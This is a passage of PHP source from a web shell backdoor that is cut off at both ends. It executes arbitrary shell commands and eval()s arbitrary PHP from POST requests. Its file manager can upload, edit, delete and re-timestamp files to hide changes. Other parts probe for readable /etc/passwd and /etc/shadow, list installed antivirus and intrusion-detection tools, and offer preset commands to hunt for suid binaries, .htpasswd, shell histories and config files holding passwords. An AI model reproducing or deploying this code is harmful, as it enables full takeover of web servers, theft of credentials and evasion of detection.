sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } function perms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } function viewPermsColor($f) { if (!@is_readable($f)) return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>'; elseif (!@is_writable($f)) return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>'; else return '<font color=#FFDB5F><b>'.perms(@fileperms($f)).'</b></font>'; } function hardScandir($dir) { if(function_exists("scandir")) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function which($p) { $path = ex('which ' . $p); if(!empty($path)) return $path; return false; } function actionRC() { if(!@$_POST['p1']) { $a = array( "uname" => php_uname(), "php_version" => phpversion(), "VERSION" => VERSION, "safemode" => @ini_get('safe_mode') ); echo serialize($a); } else { eval($_POST['p1']); } } function prototype($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } function actionSecInfo() { hardHeader(); echo '<h1>Server security information</h1><div class=content>'; function showSecParam($n, $v) { $v = trim($v); if($v) { echo '<span>' . $n . ': </span>'; if(strpos($v, "\n") === false) echo $v . '<br>'; else echo '<pre class=ml1>' . $v . '</pre>'; } } showSecParam('Server software', @getenv('SERVER_SOFTWARE')); if(function_exists('apache_get_modules')) showSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); showSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); showSecParam('Open base dir', @ini_get('open_basedir')); showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); showSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); $temp=array(); if(function_exists('mysql_get_client_info')) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists('mssql_connect')) $temp[] = "MSSQL"; if(function_exists('pg_connect')) $temp[] = "PostgreSQL"; if(function_exists('oci_connect')) $temp[] = "Oracle"; showSecParam('Supported databases', implode(', ', $temp)); echo '<br>'; if($GLOBALS['os'] == 'nix') { showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no'); showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no'); showSecParam('OS version', @file_get_contents('/proc/version')); showSecParam('Distr name', @file_get_contents('/etc/issue.net')); if(!$GLOBALS['safe_mode']) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); echo '<br>'; $temp=array(); foreach ($userful as $â) if(which($â)) $temp[] = $â; showSecParam('Userful', implode(', ',$temp)); $temp=array(); foreach ($danger as $â) if(which($â)) $temp[] = $â; showSecParam('Danger', implode(', ',$temp)); $temp=array(); foreach ($downloaders as $â) if(which($â)) $temp[] = $â; showSecParam('Downloaders', implode(', ',$temp)); echo '<br/>'; showSecParam('HDD space', ex('df -h')); showSecParam('Hosts', @file_get_contents('/etc/hosts')); showSecParam('Mount options', @file_get_contents('/etc/fstab')); } } else { showSecParam('OS Version',ex('ver')); showSecParam('Account Settings', iconv('CP866', 'UTF-8',ex('net accounts'))); showSecParam('User Accounts', iconv('CP866', 'UTF-8',ex('net user'))); } echo '</div>'; hardFooter(); } function actionFilesTools() { if( isset($_POST['p1']) ) $_POST['p1'] = urldecode($_POST['p1']); if(@$_POST['p2']=='download') { if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']); header("Content-Type: " . $type); } else header("Content-Type: application/octet-stream"); $fp = @fopen($_POST['p1'], "r"); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } }exit; } if( @$_POST['p2'] == 'mkfile' ) { if(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if($fp) { $_POST['p2'] = "edit"; fclose($fp); } } } hardHeader(); echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1'])); if(!$uid) { $uid['name'] = @fileowner($_POST['p1']); $gid['name'] = @filegroup($_POST['p1']); } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>'; echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>'; if( empty($_POST['p2']) ) $_POST['p2'] = 'view'; if( is_file($_POST['p1']) ) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); else $m = array('Chmod', 'Rename', 'Touch'); foreach($m as $v) echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> '; echo '<br><br>'; switch($_POST['p2']) { case 'view': echo '<pre class=ml1>'; $fp = @fopen($_POST['p1'], 'r'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo '</pre>'; break; case 'highlight': if( @is_readable($_POST['p1']) ) { echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">'; $code = @highlight_file($_POST['p1'],true); echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>'; } break; case 'chmod': if( !empty($_POST['p3']) ) { $perms = 0; for($i=strlen($_POST['p3'])-1;$i>=0;--$i) $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); if(!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>'; } clearstatcache(); echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>'; break; case 'edit': if( !is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; break; } if( !empty($_POST['p3']) ) { $time = @filemtime($_POST['p1']); $_POST['p3'] = substr($_POST['p3'],1); $fp = @fopen($_POST['p1'],"w"); if($fp) { @fwrite($fp,$_POST['p3']); @fclose($fp); echo 'Saved!<br><script>p3_="";</script>'; @touch($_POST['p1'],$time,$time); } } echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>'; $fp = @fopen($_POST['p1'], 'r'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo '</textarea><input type=submit value=">>"></form>'; break; case 'hexdump': $c = @file_get_contents($_POST['p1']); $n = 0; $h = array('00000000<br>','',''); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' '; switch ( ord($c[$i]) ) { case 0: $h[2] .= ' '; break; case 9: $h[2] .= ' '; break; case 10: $h[2] .= ' '; break; case 13: $h[2] .= ' '; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';} $h[1] .= '<br>'; $h[2] .= "\n"; } } echo '<table cellspacing=1 cellpadding=5 bgcolor=#222><tr><td bgcolor=#1e252e><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#060a10><pre>'.$h[1].'</pre></td><td bgcolor=#1e252e><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>'; break; case 'rename': if( !empty($_POST['p3']) ) { if(!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!<br>'; else die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>'); } echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>'; break; case 'touch': if( !empty($_POST['p3']) ) { $time = strtotime($_POST['p3']); if($time) { if(!touch($_POST['p1'],$time,$time)) echo 'Fail!'; else echo 'Touched!'; } else echo 'Bad time format!'; } clearstatcache(); echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>'; break; } echo '</div>'; hardFooter(); } if($os == 'win') $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" ); else $aliases = array( "List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" ); function actionConsole() { if(!empty($_POST['p1']) && !empty($_POST['p2'])) { prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true); $_POST['p1'] .= ' 2>&1'; } elseif(!empty($_POST['p1'])) prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0); if(isset($_POST['ajax'])) { prototype(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); echo "d.cf.cmd.value='';\n"; $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\'\0")); if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) { if(@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo "c_='".$GLOBALS['cwd']."';"; } } echo "d.cf.output.value+='".$temp."';"; echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), "\n", $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0); hardHeader(); echo "<script> if(window.Event) window.captureEvents(Event.KEYDOWN); var cmds = new Array(''); var cur = 0; function kp(e) { var n = (window.Event) ? e.which : e.keyCode; if(n == 38) { cur--; if(cur>=0) document.cf.cmd.value = cmds[cur]; else cur++; } else if(n == 40) { cur++; if(cur < cmds.length) document.cf.cmd.value = cmds[cur]; else cur--; } } function add(cmd) { cmds.pop(); cmds.push(cmd); cmds.push(''); cur = cmds.length-1; } </script>"; echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>'; foreach($GLOBALS['aliases'] as $n => $v) { if($v == '') { echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>'; continue; } echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>'; } echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_COOKIE[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>'; if(!empty($_POST['p1'])) { echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1'])); } echo '</textarea><table style="border:1px solid #060a10;background-color:#060a10;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>'; echo '</form></div><script>d.cf.cmd.focus();</script>'; hardFooter(); } function actionPhp() { if( isset($_POST['ajax']) ) { $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = true; ob_start(); eval($_POST['p1']); $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; echo strlen($temp), "\n", $temp; exit; } hardHeader(); if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) { echo '<h1>PHP info</h1><div class=content>'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace('!body {.*}!msiU','',$tmp); $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp); $tmp = preg_replace('!h1!msiU','h2',$tmp); $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp); echo $tmp; echo '</div><br>'; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false; echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">'; echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>'; if(!empty($_POST['p1'])) { ob_start(); eval($_POST['p1']); echo htmlspecialchars(ob_get_clean()); } echo '</pre></div>'; hardFooter(); } function actionFilesMan() { if (!empty ($_COOKIE['f'])) $_COOKIE['f'] = @unserialize($_COOKIE['f']); if(!empty($_POST['p1'])) { switch($_POST['p1']) { case 'uploadFile': if ( is_array($_FILES['f']['tmp_name']) ) { foreach ( $_FILES['f']['tmp_name'] as $i => $tmpName ) { if(!@move_uploaded_file($tmpName, $_FILES['f']['name'][$i])) { echo "Can't upload file!"; } } } break; case 'mkdir': if(!@mkdir($_POST['p2'])) echo "Can't create new dir"; break; case 'delete': function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/'; $dh = opendir($path); while ( ($â = readdir($dh) ) !== false) { $â = $path.$â; if ( (basename($â) == "..") || (basename($â) == ".") ) continue; $type = filetype($â); if ($type == "dir") deleteDir($â); else @unlink($â); } closedir($dh); @rmdir($path); } if(is_array(@$_POST['f'])) foreach($_POST['f'] as $f) { if($f == '..') continue; $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case 'paste': if($_COOKIE['act'] == 'copy') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']); } elseif($_COOKIE['act'] == 'move') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(@is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f); } elseif($_COOKIE['act'] == 'zip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($_POST['p2'], 1)) { chdir($_COOKIE['c']); foreach($_COOKIE['f'] as $f) { if($f == '..') continue; if(@is_file($_COOKIE['c'].$f)) $zip->addFile($_COOKIE['c'].$f, $f); elseif(@is_dir($_COOKIE['c'].$f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS)); foreach ($iterator as $key=>$value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS['cwd']); $zip->close(); } } } elseif($_COOKIE['act'] == 'unzip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); foreach($_COOKIE['f'] as $f) { if($zip->open($_COOKIE['c'].$f)) { $zip->extractTo($GLOBALS['cwd']); $zip->close(); } } } } elseif($_COOKIE['act'] == 'tar') { chdir($_COOKIE['c']); $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); ex('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); chdir($GLOBALS['cwd']); } unset($_COOKIE['f']); setcookie('f', '', time() - 3600); break; default: if(!empty($_POST['p1'])) { prototype('act', $_POST['p1']); prototype('f', serialize(@$_POST['f'])); prototype('c', @$_POST['c']); } break; } } hardHeader(); echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>'; $dirContent = hardScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); if($dirContent === false) { echo 'Can\'t open this folder!';hardFooter(); return; } global $sort; $sort = array('name', 1); if(!empty($_POST['p1'])) { if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]); } echo "<script> function sa() { for(i=0;i<d.files.elements.length;i++) if(d.files.elements[i].type == 'checkbox') d.files.elements[i].checked = d.files.elements[0].checked; } </script> <table width='100%' class='main' cellspacing='0' cellpadding='2'> <form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>"; $dirs = $files = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => viewPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file')); elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'dir')); } $GLOBALS['sort'] = $sort; function cmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); } usort($files, "cmp"); usort($dirs, "cmp"); $files = array_merge($dirs, $files); $l = 0; foreach($files as $f) { echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms'] .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>'; $l = $l?0:1; } echo "<tr><td colspan=7> <input type=hidden name=ne value=''> <input type=hidden name=a value='FilesMan'> <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'> <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'> <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; if(class_exists('ZipArchive')) echo "<option value='zip'>+ zip</option><option value='unzip'>- zip</option>"; echo "<option value='tar'>+ tar.gz</option>"; if(!empty($_COOKIE['act']) && @count($_COOKIE['f'])) echo "<option value='paste'>â³ Paste</option>"; echo "</select> "; if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) echo "file name: <input type=text name=p2 value='hard_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'> "; echo "<input type='submit' value='>>'></td></tr></form></table></div>"; hardFooter(); } function actionStringTools() { if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}} if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}} if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}} if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}} $stringTools = array( 'Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen', ); if(isset($_POST['ajax'])) { prototype(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); if(in_array($_POST['p1'], $stringTools)) echo $_POST['p1']($_POST['p2']); $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; echo strlen($temp), "\n", $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0); hardHeader(); echo '<h1>String conversions</h1><div class=content>'; echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>"; foreach($stringTools as $k => $v) echo "<option value='".htmlspecialchars($v)."'>".$k."</option>"; echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>"; if(!empty($_POST['p1'])) { if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2'])); } echo"</pre></div><br><h1>Search files:</h1><div class=content> <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'> <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr> <tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr> <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr> <tr><td></td><td><input type='submit' value='>>'></td></tr> </table></form>"; function hardRecursiveGlob($path) { if(substr($path, -1) != '/') $path.='/'; $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR))); if(is_array($paths)&&@count($paths)) { foreach($paths as $â) { if(@is_dir($â)){ if($path!=$â) hardRecursiveGlob($â); } else { if(empty($_POST['p2']) || @strpos(file_get_contents($â), $_POST['p2'])!==false) echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($â)."\", \"view\",\"\")'>".htmlspecialchars($â)."</a><br>"; } } } } if(@$_POST['p3']) hardRecursiveGlob($_POST['c']); echo "</div><br><h1>Search for 